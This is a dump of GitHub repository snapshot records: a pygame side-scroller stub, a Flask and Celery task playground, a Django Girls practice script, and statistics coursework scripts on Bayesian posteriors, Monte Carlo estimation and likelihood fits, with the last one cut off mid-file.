Schema (one row per repository snapshot; field, type, observed range):

repo_name          stringlengths   5–114
repo_url           stringlengths   24–133
snapshot_id        stringlengths   40–40
revision_id        stringlengths   40–40
directory_id       stringlengths   40–40
branch_name        stringclasses   209 values
visit_date         timestamp[ns]
revision_date      timestamp[ns]
committer_date     timestamp[ns]
github_id          int64           9.83k–683M
star_events_count  int64           0–22.6k
fork_events_count  int64           0–4.15k
gha_license_id     stringclasses   17 values
gha_created_at     timestamp[ns]
gha_updated_at     timestamp[ns]
gha_pushed_at      timestamp[ns]
gha_language       stringclasses   115 values
files              listlengths     1–13.2k
num_files          int64           1–13.2k
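For orientation, here is a minimal sketch of how rows shaped like this schema could be consumed in Python. It assumes the rows have been exported to a JSON-lines file; the filename rows.jsonl is a placeholder, not part of the dataset, and the field names are the ones listed above.

import json

# Walk a JSON-lines export of the rows and print a per-repo summary.
with open("rows.jsonl", encoding="utf-8") as fh:
    for line in fh:
        row = json.loads(line)
        print(f"{row['repo_name']} ({row['branch_name']}): "
              f"{row['num_files']} file(s), {row['star_events_count']} stars")
        # Each entry of "files" carries per-file metadata plus the raw text.
        for f in row["files"]:
            print(f"  {f['path']}  {f['language']}  {f['length_bytes']} bytes")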
repo_name: Salem200/Bermuda
repo_url: https://github.com/Salem200/Bermuda
snapshot_id: d614bf0203ef243cff5e257f2f627d54c0d2cb09
revision_id: 1b49b0fc63e235cfcfc7bd598ecfab75a8a916a0
directory_id: 69108dfa7e89e7e5cedd76defe8c9bea9dd995c1
branch_name: refs/heads/master
visit_date: 2021-01-13T02:55:17.773780
revision_date: 2016-12-28T20:31:39
committer_date: 2016-12-28T20:31:39
github_id: 77087983
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_created_at: null
gha_updated_at: null
gha_pushed_at: null
gha_language: null
files:
[ { "alpha_fraction": 0.5481727719306946, "alphanum_fraction": 0.554817259311676, "avg_line_length": 32.44444274902344, "blob_id": "eecd71d00b1192d5b44720718169d7a78b04babd", "content_id": "bac4c452d1be6173696f3fd091c8909a3e933437", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 301, "license_type": "no_license", "max_line_length": 64, "num_lines": 9, "path": "/GameObject.py", "repo_name": "Salem200/Bermuda", "src_encoding": "UTF-8", "text": "class GameObject:\n def __init__(self, img, xPos, yPos, xSpeed = 0, ySpeed = 0):\n self.pos = img.get_rect().move(xPos, yPos)\n self.xSpeed = xSpeed\n self.ySpeed = ySpeed\n self.img = img\n\n def move(self):\n self.pos = self.pos.move(xSpeed * dT, ySpeed * dT)\n" }, { "alpha_fraction": 0.5447470545768738, "alphanum_fraction": 0.5687419176101685, "avg_line_length": 24.700000762939453, "blob_id": "4324771b89966d85c6d3eb75853db436ecc28db4", "content_id": "ab4f747cdb00b647b96ea2692d6639cd063497b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1542, "license_type": "no_license", "max_line_length": 85, "num_lines": 60, "path": "/main.py", "repo_name": "Salem200/Bermuda", "src_encoding": "UTF-8", "text": "import pygame, sys, time\nfrom pygame.locals import *\nimport GameObject\n\ndef main():\n pygame.init()\n\n wWidth = 800\n wHeight = 600\n\n WHITE = (255, 255, 255)\n anne = pygame.image.load(\"sprites/Anne_01.png\")\n annex4 = pygame.image.load(\"sprites/Anne_01_x4.png\")\n staffan = pygame.image.load(\"staffan.jpg\")\n staffanX = 1\n staffanY = 1\n xSpeed = 100 #px/s\n ySpeed = 100 #px/s\n\n #set up the window\n DISPLAYSURF = pygame.display.set_mode((wWidth, wHeight), 0, 32)\n pygame.display.set_caption(\"Bermuda\")\n\n #init previus time for delta calculation\n prevTime = pygame.time.get_ticks()\n global dT\n\n #main game loop\n while True:\n DISPLAYSURF.fill(WHITE)\n\n #calculate delta time\n currentTime = pygame.time.get_ticks()\n dT = currentTime - prevTime\n dT /= 1000 #convert from ms to s\n prevTime = currentTime\n \n #event handling loop\n for event in pygame.event.get():\n if event.type == QUIT or (event.type == KEYUP and event.key == K_ESCAPE):\n pygame.quit()\n sys.exit()\n\n #movement\n keys = pygame.key.get_pressed()\n if keys[K_RIGHT]:\n staffanX += xSpeed * dT\n if keys[K_LEFT]:\n staffanX -= xSpeed * dT\n if keys[K_UP]:\n staffanY -= ySpeed * dT\n if keys[K_DOWN]:\n staffanY += ySpeed * dT\n\n\n DISPLAYSURF.blit(annex4, (staffanX, staffanY))\n\n pygame.display.flip()\n\nif __name__ == \"__main__\": main()\n" }, { "alpha_fraction": 0.7894737124443054, "alphanum_fraction": 0.7894737124443054, "avg_line_length": 18, "blob_id": "b772cd25d3113b43f475802c77bddb1f43317047", "content_id": "1fd048807840ae36dcd2114985968b2c32e9465d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 38, "license_type": "no_license", "max_line_length": 27, "num_lines": 2, "path": "/README.md", "repo_name": "Salem200/Bermuda", "src_encoding": "UTF-8", "text": "# Bermuda\nSide-scrolling-pirate-em-up\n" } ]
num_files: 3
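As an aside, a row's files list contains enough information to reconstruct the snapshot on disk. The following is a minimal sketch, assuming a row has already been parsed into a Python dict as above; the output directory name snapshot_out is a placeholder.

import os

def materialize(row, out_dir="snapshot_out"):
    # Write each file's "text" payload back to its recorded path,
    # creating intermediate directories as needed.
    for f in row["files"]:
        dest = os.path.join(out_dir, row["repo_name"], f["path"].lstrip("/"))
        os.makedirs(os.path.dirname(dest), exist_ok=True)
        with open(dest, "w", encoding=f["src_encoding"].lower()) as fh:
            fh.write(f["text"])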
repo_name: devaljain1998/WorkCeleryPlayground
repo_url: https://github.com/devaljain1998/WorkCeleryPlayground
snapshot_id: 0b64416bee67f6f03b01598b697fbf0835f2a820
revision_id: 7c69c2cd37d6dd6f0c31a1254beab35cbdd07521
directory_id: 699233dbbb4d168c0c7efb884dfd5d123e2b7e49
branch_name: refs/heads/main
visit_date: 2023-02-27T06:58:44.340717
revision_date: 2021-02-04T08:31:06
committer_date: 2021-02-04T08:31:06
github_id: 333749553
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_created_at: null
gha_updated_at: null
gha_pushed_at: null
gha_language: null
files:
[ { "alpha_fraction": 0.6442764401435852, "alphanum_fraction": 0.6498920321464539, "avg_line_length": 33.55970001220703, "blob_id": "b8d98148ae3a1c24ba62f50bcf0f65d11512034d", "content_id": "0e1d18102accd0cf112bc2ba5375f5092a514c41", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4630, "license_type": "no_license", "max_line_length": 109, "num_lines": 134, "path": "/app.py", "repo_name": "devaljain1998/WorkCeleryPlayground", "src_encoding": "UTF-8", "text": "from flask import Flask\nfrom celery_importer import make_celery\nfrom time import sleep\nfrom datetime import datetime\nimport celery\nfrom celery import chain, group\n\napp = Flask(__name__)\nbackend='rpc://'\nbroker='pyamqp://'\napp.config.update(\n # CELERY_BROKER_URL='amqp://localhost:15672',\n # CELERY_RESULT_BACKEND='rpc://'\n \n # TEST:\n CELERY_BROKER_URL = broker,\n CELERY_RESULT_BACKEND = backend\n)\ncelery_worker = make_celery(app)\n\[email protected]('/')\ndef hello_world():\n hello_world_on_a_different_queue_task.delay('Deval for a different Queue!')\n return 'Hello, World!'\n\[email protected]('/add/<int:a>/<int:b>', methods=['GET'])\ndef add_digits_route(a: int, b: int):\n # task_handler_task.delay()\n delay_task.delay()\n print(f'got: a={a}, b={b}')\n get_sum_of_digits = lambda a, b: int(a) + int(b)\n sum_of_digits = get_sum_of_digits(a, b)\n return f\"sum of {a} + {b} : {sum_of_digits}\"\n\[email protected]('/div/<int:a>/<int:b>', methods=['GET'])\ndef div_digits_route(a: int, b: int):\n print(f'got: a={a}, b={b}')\n divison_task.delay(a, b)\n return \"Called divison task!\"\n\n\n# CELERY TASKS: #\n# Task1: A normal celery task:\n@celery_worker.task(name=\"app.simple_delay_task\")\ndef delay_task(duration=10):\n try:\n print(f'Inside delay_task', f'time= {datetime.now()}')\n print(f\"Delaying task for {duration} duration.\")\n for i in range(duration):\n print(i + 1, \"seconds\")\n sleep(1)\n print('Delay completed!', datetime.now())\n return\n except celery.exceptions.SoftTimeLimitExceeded as e:\n print('Soft time limit exceed. 
Terminating!')\n\n# Task2: A Periodic Celery Task\n@celery_worker.task(name='app.simple_periodic_task')\ndef simple_periodic_task(name: str = 'Deval'):\n print(f'Hey {name}, How you doin?')\n current_time = datetime.now()\n print(f'Task completed at time: {current_time}')\n\n \n@celery_worker.task(name='app.every_2_min_repeating_task')\ndef every_2_min_repeating_task(name: str = 'Deval'):\n print(f'Hey {name}, How you doin?', \"let's meet after 2 min :)\")\n current_time = datetime.now()\n print(f'Task completed at time: {current_time}')\n\n \n# Task3: Calling Task with Task\n@celery_worker.task(name='app.task_handler')\ndef task_handler_task():\n print(\"Inside task_handler -> calling: delay_task\")\n delay_task.s().delay(duration=4)\n print(\"Completed delay_task, now back to task_handler\")\n\n# Task4: Different ways of executing a task in celery:\[email protected]('/greet/<name>/<int:delay>', methods=['GET'])\[email protected]('/greet/<name>/', methods=['GET'])\ndef greetings_route_with_different_methods(name, delay: int = 0):\n print(f'Inside', greetings_route_with_different_methods.__name__)\n print(f'Current time: ', datetime.now())\n if delay == 0:\n delay_task.delay()\n else:\n print(f'Now applying apply_async and it will be starting after countdown of {delay} seconds.')\n delay_task.apply_async((delay,), countdown=delay)\n \n return f'Hey {name}, How you doing?'\n\n# Task5: Adding task on a different queue:\n# cmd: celery -A app.celery_worker -l INFO -Q celery,queue2\n@celery_worker.task(name='app.hello_world_on_a_different_queue_task')\ndef hello_world_on_a_different_queue_task(name: str):\n print(f'Hello', name)\n \n# Task7: Retry task:\n@celery_worker.task(bind=True, name='app.divison_task')\ndef divison_task(self, a: int, b: int):\n print('Inside', divison_task.__name__)\n print('for', dict(a=a, b=b))\n try:\n quotient = a / b\n return quotient\n except ZeroDivisionError as exc:\n print('ZeroDivisonError occured for: ', dict(a=a, b=b))\n print('Now incrementing b')\n b += 1\n raise self.retry(exc = exc, countdown=3, max_retries=5)\n except Exception as e:\n print('Got another excpetion', 'now incrementing b', dict(a=a, b=b))\n divison_task.s().delay(a, b + 1)\n \n# POC: chain\n@celery_worker.task(name='app.string_printer')\ndef string_printer(string: str, other_string: str = None) -> str:\n current_string = string if not other_string else string+other_string\n print('Inside', string_printer.__name__)\n print(current_string)\n return current_string\n\[email protected]('/chain/addition/<initial_string>', methods=['GET'])\ndef chain_route(initial_string: str):\n print('Inside: ', chain_route.__name__)\n result = chain(\n string_printer.s(initial_string), string_printer.s(initial_string), string_printer.s(initial_string))\n result.delay()\n print('Called chain')\n # final_result = result.get()\n # print(final_result)\n # return final_result\n return 'TEST'" }, { "alpha_fraction": 0.6136363744735718, "alphanum_fraction": 0.6221590638160706, "avg_line_length": 22.5, "blob_id": "d060854efad426c47a7d38bf7cf03da20b322f6a", "content_id": "d786099136d059e57879902b39daaaafd7959a8f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 704, "license_type": "no_license", "max_line_length": 68, "num_lines": 30, "path": "/celery_config.py", "repo_name": "devaljain1998/WorkCeleryPlayground", "src_encoding": "UTF-8", "text": "from celery.schedules import crontab\n\n\n# CELERY_IMPORTS = ('app.tasks.test')\nCELERY_TASK_RESULT_EXPIRES = 
30\nCELERY_TIMEZONE = 'UTC'\n\nCELERY_ACCEPT_CONTENT = ['json', 'msgpack', 'yaml']\nCELERY_TASK_SERIALIZER = 'json'\nCELERY_RESULT_SERIALIZER = 'json'\n\n# TIME LIMITS:\nCELERYD_TASK_SOFT_TIME_LIMIT = 5\n\nCELERYBEAT_SCHEDULE = {\n 'test-celery': {\n 'task': 'app.simple_periodic_task',\n # Every minute\n 'schedule': crontab(minute=\"*\"),\n },\n 'every-five-minutes': {\n 'task': 'app.every_2_min_repeating_task',\n # Every minute\n 'schedule': crontab(minute=\"*/2\"),\n },\n}\n\nCELERY_ROUTES = {\n 'app.hello_world_on_a_different_queue_task': {'queue': 'queue2'}\n}" }, { "alpha_fraction": 0.5408719182014465, "alphanum_fraction": 0.7138964533805847, "avg_line_length": 18.83783721923828, "blob_id": "295edfb97116e576c88c3e16b4303e2c1bb4a7f4", "content_id": "03cdbf8e88d1c7643bc31bb6607ab91523b3f14b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 2202, "license_type": "no_license", "max_line_length": 38, "num_lines": 111, "path": "/requirements.txt", "repo_name": "devaljain1998/WorkCeleryPlayground", "src_encoding": "UTF-8", "text": "adal==1.2.4\namqp==2.6.1\nanyjson==0.3.3\nappnope==0.1.2\nattrs==20.3.0\nazure-batch==3.0.0\nazure-common==1.1.25\nazure-core==1.6.0\nazure-datalake-store==0.0.48\nazure-graphrbac==0.30.0\nazure-keyvault==0.3.7\nazure-mgmt==1.0.0\nazure-mgmt-authorization==0.30.0\nazure-mgmt-batch==4.0.0\nazure-mgmt-cdn==0.30.3\nazure-mgmt-cognitiveservices==1.0.0\nazure-mgmt-compute==1.0.0\nazure-mgmt-containerregistry==0.2.1\nazure-mgmt-datalake-analytics==0.1.6\nazure-mgmt-datalake-nspkg==3.0.1\nazure-mgmt-datalake-store==0.1.6\nazure-mgmt-devtestlabs==2.0.0\nazure-mgmt-dns==1.0.1\nazure-mgmt-documentdb==0.1.3\nazure-mgmt-iothub==0.2.2\nazure-mgmt-keyvault==0.31.0\nazure-mgmt-logic==2.1.0\nazure-mgmt-monitor==0.2.1\nazure-mgmt-network==1.0.0\nazure-mgmt-nspkg==3.0.2\nazure-mgmt-rdbms==0.1.0\nazure-mgmt-redis==4.1.1\nazure-mgmt-resource==1.1.0\nazure-mgmt-scheduler==1.1.3\nazure-mgmt-sql==0.5.3\nazure-mgmt-storage==1.0.0\nazure-mgmt-trafficmanager==0.30.0\nazure-mgmt-web==0.32.0\nazure-nspkg==3.0.2\nazure-servicebus==0.21.1\nazure-servicefabric==5.6.130\nazure-servicemanagement-legacy==0.20.7\nazure-storage==0.34.2\nbackcall==0.1.0\nbilliard==3.6.3.0\nbotocore==1.17.57\ncelery==4.3.0\ncertifi==2020.4.5.2\ncffi==1.14.0\nchardet==3.0.4\nclick==7.1.2\nclick-didyoumean==0.0.3\nclick-plugins==1.1.1\nclick-repl==0.1.6\ncryptography==2.9.2\ndecorator==4.4.2\ndocutils==0.15.2\nFlask==1.1.2\nfuture==0.18.2\ngevent==20.6.2\ngreenlet==0.4.16\nidna==2.9\niniconfig==1.1.1\nipython-genutils==0.2.0\nisodate==0.6.0\nitsdangerous==0.24\njedi==0.17.0\njeepney==0.4.3\nJinja2==2.11.2\njmespath==0.10.0\nkeyring==21.2.1\nkombu==4.6.11\nlinecache2==1.0.0\nMarkupSafe==1.1.1\nmarshmallow==3.5.0\nmsrest==0.6.15\nmsrestazure==0.4.34\noauthlib==3.1.0\npackaging==20.8\nparso==0.7.0\npexpect==4.8.0\npickleshare==0.7.5\npika==0.13.0\npluggy==0.13.1\nprompt-toolkit==3.0.5\nptyprocess==0.6.0\npy==1.10.0\nPyAMQP==0.1.0.7\npycodestyle==2.6.0\npycparser==2.20\nPygments==2.6.1\nPyJWT==1.7.1\npyOpenSSL==19.1.0\npyparsing==2.4.7\npytest==6.2.2\npython-dateutil==2.8.1\npytz==2020.1\nrequests==2.24.0\nrequests-oauthlib==1.3.0\ns3transfer==0.3.3\nsix==1.15.0\ntoml==0.10.1\ntraceback2==1.4.0\ntraitlets==4.3.3\nunittest2==1.1.0\nurllib3==1.25.9\nvine==1.3.0\nwcwidth==0.2.4\nWerkzeug==1.0.1\nzope.event==4.4\nzope.interface==5.1.0\n" }, { "alpha_fraction": 0.7111111283302307, "alphanum_fraction": 0.7333333492279053, "avg_line_length": 10.5, "blob_id": 
"02da66a5a0bb6689c3120cc4327c4ac291acffa3", "content_id": "0ce08a60a0524f65bf0546768fcb0d792ca1d98a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 45, "license_type": "no_license", "max_line_length": 27, "num_lines": 4, "path": "/run_py3_env.sh", "repo_name": "devaljain1998/WorkCeleryPlayground", "src_encoding": "UTF-8", "text": "#!/bin/sh\n\nsource py3venv/bin/activate\ncode ." } ]
num_files: 4
repo_name: izaprzy/my-first-blog
repo_url: https://github.com/izaprzy/my-first-blog
snapshot_id: 96b990985d8910ab5d5554f495b6771587e37c5d
revision_id: ce460c218871c61dafa72e550c53fbb0ccc3cd02
directory_id: 70e653d7eee935fbacdce91e593cc1f81ee9ecf8
branch_name: refs/heads/master
visit_date: 2020-06-10T03:17:28.913227
revision_date: 2017-03-30T13:51:36
committer_date: 2017-03-30T13:51:36
github_id: 76110896
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_created_at: null
gha_updated_at: null
gha_pushed_at: null
gha_language: null
files:
[ { "alpha_fraction": 0.5829596519470215, "alphanum_fraction": 0.5964125394821167, "avg_line_length": 17.58333396911621, "blob_id": "7a900253b6439274cd3050b73c8d39882e6c3f6d", "content_id": "ee43c22d4af14b6ddb9593df0f3c44b2daa35055", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 225, "license_type": "no_license", "max_line_length": 58, "num_lines": 12, "path": "/hello.py", "repo_name": "izaprzy/my-first-blog", "src_encoding": "UTF-8", "text": "def hej(imie):\n print('Hej ' + imie + '!')\n\n\ndziewczyny = [\"Iza\", \"Ania\", \"Sonia\", \"Patrycja\", \"Kasia\"]\nfor imie in dziewczyny:\n hej(imie)\n print(\"Witamy kolejną uczestniczkę\")\n\n\nfor i in range(1,10):\n print(i)\n" }, { "alpha_fraction": 0.8152173757553101, "alphanum_fraction": 0.8152173757553101, "avg_line_length": 91, "blob_id": "2e4f12b3b15b4d79f12bec816e6b1ade9e492a43", "content_id": "f9445ba34a68f38fc3b5741b55452308e068c4da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 184, "license_type": "no_license", "max_line_length": 140, "num_lines": 2, "path": "/README.md", "repo_name": "izaprzy/my-first-blog", "src_encoding": "UTF-8", "text": "One-day programming with Django Girls - a non-profit organization and a community that empowers and helps women to organize free workshops \nby providing tools, resources and support.\n" } ]
num_files: 2
repo_name: DanielRamyar/AdvancedMethodsInAppliedStatistics
repo_url: https://github.com/DanielRamyar/AdvancedMethodsInAppliedStatistics
snapshot_id: 15bb321c47e5731fa387dbc9451efcbc76a5d141
revision_id: 816751ed91777e32382092e1a263c2fa37e5d0a7
directory_id: f31afbcf72d524ad12f7e4715648ef95748316c7
branch_name: refs/heads/master
visit_date: 2020-05-03T04:18:00.192206
revision_date: 2019-04-05T06:32:28
committer_date: 2019-04-05T06:32:28
github_id: 178417752
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_created_at: null
gha_updated_at: null
gha_pushed_at: null
gha_language: null
files:
[ { "alpha_fraction": 0.6128491759300232, "alphanum_fraction": 0.6474860310554504, "avg_line_length": 29.86206817626953, "blob_id": "76085705c3dfeb4d3c630629d30311d759ef7d7e", "content_id": "43bf0f5b555fc08e525f6350b01a27e034bde4f7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1790, "license_type": "no_license", "max_line_length": 121, "num_lines": 58, "path": "/Week_2/Class_4/bayes_3.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport math\nimport matplotlib.pyplot as plt\n\n\nk = 4\nbig_k = 50\nn = 30\n\n\ndef my_binomial_coefficient(n, k):\n result = math.factorial(n) / (math.factorial(k) * math.factorial(n - k))\n return result\n\ndef my_hypergeo(k, K, n, N):\n result = my_binomial_coefficient(K, k) * my_binomial_coefficient(N - K, n - k) / my_binomial_coefficient(N, n)\n return result\n\ndef my_gauss(x, mu, sigma):\n result = 1/(np.sqrt(2 * np.pi * sigma ** 2)) * np.exp(-(x - mu) ** 2 / (2 * sigma ** 2))\n return result\n\n\nposterior_flat = np.array([])\nposterior = np.array([])\nprior = np.array([])\nmu = 500\nsigma = 500 * np.sqrt((300/5000) ** 2 + (1/10) ** 2)\nmy_start = big_k + n - k\n\n\nfor i in np.arange(my_start, 2000):\n temp = my_hypergeo(k, big_k, n, i)\n \n posterior = np.append(posterior, temp * my_gauss(i, mu, sigma))\n posterior_flat = np.append(posterior_flat, temp)\n\n prior = np.append(prior, my_gauss(i, mu, sigma))\n\nk=8\nposterior_flat_newk = np.array([])\nposterior_newk = np.array([])\nfor i in np.arange(my_start, 2000):\n temp = my_hypergeo(k, big_k, n, i)\n \n posterior_newk = np.append(posterior_newk, temp * my_gauss(i, mu, sigma))\n posterior_flat_newk = np.append(posterior_flat_newk, temp)\n\n\n\nplt.plot(np.arange(my_start, 2000), posterior_flat/np.sum(posterior_flat), 'r', label='flat/LLH k=4')\nplt.plot(np.arange(my_start, 2000), posterior/np.sum(posterior), 'r', linestyle='dashed', label='gaussian k=4')\n\nplt.plot(np.arange(my_start, 2000), posterior_flat_newk/np.sum(posterior_flat_newk), 'b', label='flat/LLH k=8')\nplt.plot(np.arange(my_start, 2000), posterior_newk/np.sum(posterior_newk), 'b', linestyle='dashed', label='gaussian k=8')\nplt.plot(np.arange(my_start, 2000), prior/np.sum(prior), 'k', label='prior')\nplt.legend()\nplt.show()\n" }, { "alpha_fraction": 0.4951871633529663, "alphanum_fraction": 0.5657753944396973, "avg_line_length": 23.605262756347656, "blob_id": "c68fcec1146748ed56057ec1080557c92002d3e2", "content_id": "85e2d0a77d06328cca9736154357f7d2eaf7d532", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 935, "license_type": "no_license", "max_line_length": 74, "num_lines": 38, "path": "/Week_1/Class_2/mc_pi_precision.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import random\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nrandom.seed(142)\n\n# N is the number of throws per test\nN = 100000\nnumber_of_tests = 1\npi = np.empty((1, 0))\ncounter = 1\n# Fill my arrays with random numbers\nfor i in range(number_of_tests):\n\n x = np.empty((1, 0))\n y = np.empty((1, 0))\n x_missed = np.empty((1, 0))\n y_missed = np.empty((1, 0))\n\n for i in range(N):\n\n x_random = random.random()\n y_random = random.random()\n if (np.sqrt(x_random**2 + y_random**2)) < 1:\n x = np.append(x, x_random)\n y = np.append(y, y_random)\n\n else:\n x_missed = np.append(x_missed, x_random)\n y_missed = 
np.append(y_missed, y_random)\n\n if counter in [10, 100, 1000, 10000, 100000]:\n pi = np.append(pi, len(x) / counter * 4)\n counter += 1\n\n\nplt.plot([10, 100, 1000, 10000, 100000], pi, marker='o', linestyle='None')\nplt.show()\n" }, { "alpha_fraction": 0.5275827646255493, "alphanum_fraction": 0.5576730370521545, "avg_line_length": 20.23404312133789, "blob_id": "96ebfdaf69f2ccc2d003777a454c4cc3ddd327be", "content_id": "1438f62cb29708b00566e5881c75bcfeee80f8aa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 997, "license_type": "no_license", "max_line_length": 76, "num_lines": 47, "path": "/Project/test.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\n\nA = np.array([[1., 2, 3],\n [5, 4, 2],\n [11, 8, 9],\n [4, 7, 1]])\nA = np.insert(A, 0, np.ones(A.shape[0]), axis=1)\nA = np.insert(A, 0, np.zeros(A.shape[0]), axis=1)\n\n\nindex = np.random.randint(len(A), size=(2))\ninit_cent = A[index, :]\n\n\nprint(init_cent)\n\n\n\ndef dist_centroids(data, cent):\n '''\n Returns the distance between each point (each row in data) and centroids\n '''\n dist = []\n for i in range(cent.shape[0]):\n print(cent[i, 1::], 'lknl')\n temp = np.linalg.norm(data[:, 2::] - cent[i, 2::], axis=1)\n dist = np.append(dist, temp)\n print(dist.shape)\n dist = dist.reshape((cent.shape[0], data.shape[0])).T\n return dist\n\ndef label_centroids(data, dist):\n '''\n Adds Label to data according to its closest centroid\n '''\n\n temp = np.argmin(dist, axis=1) + 1\n\n data[:, 0] = temp\n\n return data\n\n\ndisto = dist_centroids(A, init_cent)\nprint(A)\nA = label_centroids(A, disto)\nprint(A)" }, { "alpha_fraction": 0.6238532066345215, "alphanum_fraction": 0.6720183491706848, "avg_line_length": 20.799999237060547, "blob_id": "d626b20e96e49037a4138445f307472275801813", "content_id": "50f8ec8accca9739d00f43f9a33b48cb31abe73e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 436, "license_type": "no_license", "max_line_length": 95, "num_lines": 20, "path": "/Week_3/Class_6/coin_flip_1.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport math\nimport matplotlib.pyplot as plt\nfrom scipy.stats import beta\nfrom scipy.stats import binom\n\n\na = 5\nb = 17\ntheta = np.linspace(0, 1, 1000)\n\nn = 100\nk = 66\n\n\nplt.plot(theta, beta.pdf(theta, a, b), 'k', label='prior')\nplt.plot(theta, binom.pmf(k, n, theta) * 10, 'b', label='likelyhood')\nplt.plot(theta, beta.pdf(theta, a, b) * binom.pmf(k, n, theta) * 10000, 'r', label='posterior')\nplt.legend()\nplt.show()\n" }, { "alpha_fraction": 0.5172358751296997, "alphanum_fraction": 0.5675805807113647, "avg_line_length": 25.544681549072266, "blob_id": "c0278cc2f97beb5e9cf896fdb71956754f09227f", "content_id": "0c8d903a3794911c3fb7254c44cccb0177164eb5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6237, "license_type": "no_license", "max_line_length": 87, "num_lines": 235, "path": "/Exam_2019/Code/Problem_1.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import minimize\nfrom scipy.stats import chisquare, chi2, binom, poisson\nimport random\nfrom scipy import integrate\n\n\ndef f_1(x, a):\n return (1 / (x + 5)) * np.sin(a * x)\n\n\ndef f_2(x, 
a):\n return np.sin(a * x) + 1\n\n\ndef f_3(x, a):\n return np.sin(a * (x ** 2))\n\n\ndef f_4(x, a):\n return np.sin(a * x + 1) ** 2\n\n\ndef f_5(x):\n return x * np.tan(x)\n\n\ndef f_6(x, a, b):\n return (1 + a * x + b * (x ** 2)) / ((2/3) * (b + 3))\n\n\ndef f_7(x, a, b):\n return a + b * x\n\n\ndef f_8(x, a, b, c):\n return (np.sin(a * x) + c * np.exp(b * x) + 1)\n\n\ndef f_9(x, a, b):\n normz = (np.sqrt(2 * np.pi) * np.abs(b))\n my_func = np.exp(-(x - a) ** 2 / (2 * (b ** 2))) / normz\n return my_func\n\n\ndef my_pdf1(VAR, x):\n a, b = VAR\n\n pdf = f_6(x, a, b)\n\n ln_pdf = np.log((pdf))\n result = np.sum(-ln_pdf)\n return result\n\n\ndef my_pdf2(VAR, k):\n mu = VAR\n\n pdf = poisson.pmf(k, mu)\n\n ln_pdf = np.log((pdf))\n result = np.sum(-ln_pdf)\n return result\n\n\ndef my_pdf3(VAR, x):\n a, b, c = VAR\n\n normz = integrate.quad(f_8, 20, 27, args=(a, b, c))\n\n pdf = f_8(x, a, b, c) / normz[0]\n\n ln_pdf = np.log((pdf))\n result = np.sum(-ln_pdf)\n return result\n\ndef my_pdf4(VAR, k):\n p = VAR\n\n pdf = binom.pmf(k, 5000, p)\n\n ln_pdf = np.log((pdf))\n result = np.sum(-ln_pdf)\n return result\n\n\nfname = 'Exam_2019_Prob1.txt'\ndata = np.loadtxt(fname)\n\n\nz0 = data[:, 0]\nz1 = data[:, 1]\nz2 = data[:, 2]\n\na_bound = (0, 10)\nb_bound = (-10, 10)\nc_bound = (4000, 8000)\n\nn_bound = (0, None)\np_bound = (0, None)\n\nmu_bound = (0, None)\n\ndata_0 = minimize(my_pdf3, [4, -0.1, 4150], args=(z0), method='SLSQP',\n bounds=(a_bound, b_bound, c_bound))\n\ndata_1 = minimize(my_pdf1, [1, 1], args=(z1), method='SLSQP',\n bounds=(a_bound, b_bound))\n\ndata_2 = minimize(my_pdf2, [1, ], args=(z2), method='SLSQP',\n bounds=(mu_bound, ))\n\ndata_3 = minimize(my_pdf4, [0.001, ], args=(z2), method='SLSQP',\n bounds=((0, None), ))\n\n\nprint(data_0)\nprint(data_1)\nprint(data_2)\nprint('spe')\nprint(data_3)\n\n\n###############################################################################\nbinwidth = 0.05\nn_bins = np.arange(min(z1), max(z1) + binwidth, binwidth)\n\n# Chi2 calculator\nobserved_values, bins, _ = plt.hist(z1, bins=n_bins)\nplt.close()\n# We normalize by multiplyting the length of the data with the binwidth\nexpected_values = f_6(bins[:-1], data_1.x[0], data_1.x[1]) * len(z1) * binwidth\n\nprint(observed_values)\nprint(expected_values)\nmy_chi = chisquare(observed_values,\n f_exp=expected_values)\nprint(my_chi)\nprint('Threshold value ', chi2.isf(0.05, len(expected_values)-2))\n\nprint(len(expected_values)-2)\nplt.figure()\nplt.hist(z1, bins=n_bins, normed=True, label='Data Column 2')\nx = np.arange(-1, 1, 0.01)\ny = f_6(x, data_1.x[0], data_1.x[1]) \nfit1_label = ('Fit: $1+ax+bx^2$, a=%.02f, b=%.02f \\n$\\chi^2=%.02f$' %\n (data_1.x[0], data_1.x[1], my_chi[0]))\nplt.plot(x,y, label=fit1_label, color='r')\nplt.legend()\nplt.savefig('prob1_Column2.pdf')\n# plt.show()\n###############################################################################\nprint('Data 2 starts here')\nbinwidth = 0.1\nn_bins = np.arange(min(z2), max(z2) + binwidth, binwidth)\n\n# Chi2 calculator\nobserved_values, bins, _ = plt.hist(z2, bins=n_bins, label='Data Column 